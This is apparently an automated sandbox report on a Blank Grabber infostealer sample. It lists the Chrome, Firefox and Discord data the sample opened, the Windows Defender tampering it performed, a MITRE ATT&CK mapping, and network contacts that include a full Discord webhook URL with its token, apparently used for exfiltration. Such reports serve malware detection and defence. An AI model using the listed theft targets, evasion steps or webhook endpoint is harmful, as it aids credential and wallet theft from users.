              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Discord
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\DiscordCanary
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\DiscordPTB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\DiscordDevelopment
              Source: Yara matchFile source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2090937481.000001C917404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7264, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI72642\rarreg.key, type: DROPPED
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR
              MITRE ATT&CK Matrix (techniques listed per tactic column, in the report's row order; the number in parentheses is the report's badge for that technique, kept as shown)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
              Execution: Windows Management Instrumentation (241); Native API (1); Command and Scripting Interpreter (2); PowerShell (3); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
              Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Defense Evasion: Disable or Modify Tools (3); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (21); Software Packing (11); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (151); Access Token Manipulation (1); Process Injection (11)
              Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
              Discovery: System Time Discovery (2); File and Directory Discovery (3); System Information Discovery (58); Security Software Discovery (161); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Network Configuration Discovery (1); Network Sniffing; Network Service Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
              Collection: Archive Collected Data (1); Data from Local System (2); Email Collection (11); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
              Command and Control: Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
              Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
              Behavior Graph (interactive graph and icon legend omitted; the graph's node contents are listed below as a process tree)

              Behavior Graph ID: 1561562 Sample: cmd.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100
              Contacted hosts: ip-api.com; discord.com
              Sample-level signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Blank Grabber; 9 other signatures

              • cmd.exe 22 (started)
                Dropped: C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+; C:\Users\user\AppData\Local\...\rarreg.key, ASCII; C:\Users\user\AppData\...\unicodedata.pyd, PE32+; 16 other files (none is malicious)
                Signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Removes signatures from Windows Defender
                • cmd.exe (started)
                  Network: ip-api.com 208.95.112.1, 49747, 80 TUT-ASUS United States; discord.com 162.159.128.233, 443, 49748 CLOUDFLARENETUS United States
                  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; 3 other signatures
                  • cmd.exe 1 (started)
                    Signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy
                    • powershell.exe 23 (started)
                    • conhost.exe (started)
                  • cmd.exe 1 (started)
                    Signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
                    • powershell.exe 23 (started)
                    • 2 other processes
                  • cmd.exe 1 (started)
                    Signatures: Adds a directory exclusion to Windows Defender
                    • powershell.exe 23 (started)
                      Signatures: Loading BitLocker PowerShell Module
                    • conhost.exe (started)
                  • 22 other processes
                    • getmac.exe (started)
                      Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
                    • systeminfo.exe (started)
                    • 42 other processes
                      Dropped: C:\Users\user\AppData\...\bcdu5fii.cmdline, Unicode; C:\Users\user\AppData\Local\Temp\DBdXv.zip, RAR
                      • csc.exe (started)
                        Dropped: C:\Users\user\AppData\Local\...\bcdu5fii.dll, PE32
                        • cvtres.exe (started)
              • svchost.exe (started)
                Network: 127.0.0.1 unknown unknown



Source | Detection | Scanner | Label | Link
cmd.exe | 37% | ReversingLabs | Win64.Trojan.Generic | 
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\_MEI72642\VCRUNTIME140.dll | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_bz2.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_ctypes.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_decimal.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_hashlib.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_lzma.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_queue.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_socket.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_sqlite3.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\_ssl.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\libcrypto-1_1.dll | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\libffi-7.dll | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\libssl-1_1.dll | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\python310.dll | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\select.pyd | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\sqlite3.dll | 0% | ReversingLabs | | 
C:\Users\user\AppData\Local\Temp\_MEI72642\unicodedata.pyd | 0% | ReversingLabs | | 
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://ocsp.sectigoc | 0% | Avira URL Cloud | safe | 
http://crl.comodoi | 0% | Avira URL Cloud | safe | 
http://crl.microsus | 0% | Avira URL Cloud | safe | 
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC | 0% | Avira URL Cloud | safe | 
http://crl.comodo | 0% | Avira URL Cloud | safe | 
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.128.233 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_speccmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#cmd.exefalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://github.com/urllib3/urllib3/issues/2920cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsCcmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datacmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://yahoo.com/cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://account.bellmedia.ccmd.exe, 00000001.00000002.2100068134.000001C917A74000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6cmd.exe, 00000001.00000002.2096563852.000001C916813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://api.gofile.io/getServerr;rcmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://g.live.com/odclientsettings/ProdV2edb.log.28.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://login.microsoftonline.comcmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A58000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                                      high
